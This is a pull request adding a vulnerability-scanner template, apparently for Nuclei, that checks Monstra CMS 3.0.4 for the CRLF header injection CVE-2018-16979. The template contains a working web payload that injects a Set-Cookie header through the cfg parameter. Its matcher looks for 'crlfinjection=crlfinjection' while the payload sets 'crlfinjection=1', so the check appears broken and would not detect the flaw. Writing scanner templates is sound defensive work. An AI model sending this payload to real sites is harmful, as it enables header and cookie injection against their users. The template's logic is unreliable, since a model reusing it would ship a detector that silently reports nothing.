### PR TITLE
Create CVE-2018-16979.yaml

### DIFF
--- a/CVE-2018-16979.yaml
+++ b/CVE-2018-16979.yaml
@@ -1,0 +1,27 @@
+id: CVE-2018-16979
+
+info:
+  name: Monstra CMS V3.0.4 - HTTP header injection
+  author: 0x_Akoko
+  severity: medium
+  description: Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter.
+  reference:
+    - https://vuldb.com/?id.123966
+    - https://www.cvedetails.com/cve/CVE-2018-16979
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2018-16979
+    cwe-id: CWE-113
+  tags: cve,cve2018,crlf,mostracms
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/monstra-master/plugins/captcha/crypt/cryptographp.php?cfg=1%0D%0ASet-Cookie:%20crlfinjection=1"
+      
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)'


### PR DESCRIPTION
### Template / PR Information

### Monstra CMS V3.0.4 - HTTP header injection

Monstra CMS V3.0.4 allows HTTP header injection in the plugins/captcha/crypt/cryptographp.php cfg parameter, a related issue to CVE-2012-2943.

**This vulnerability is traded as [CVE-2018-16979](https://vuldb.com/?source_cve.123966) since 09/12/2018. It is possible to launch the attack remotely. The exploitation doesn't require any form of authentication**

- Reference:
    - https://github.com/howchen/howchen/issues/4
    - https://vuldb.com/?id.123966
    - https://www.cvedetails.com/cve/CVE-2018-16979

### Template Validation

I've validated this template locally?
- [ ] YES
- [ ] NO
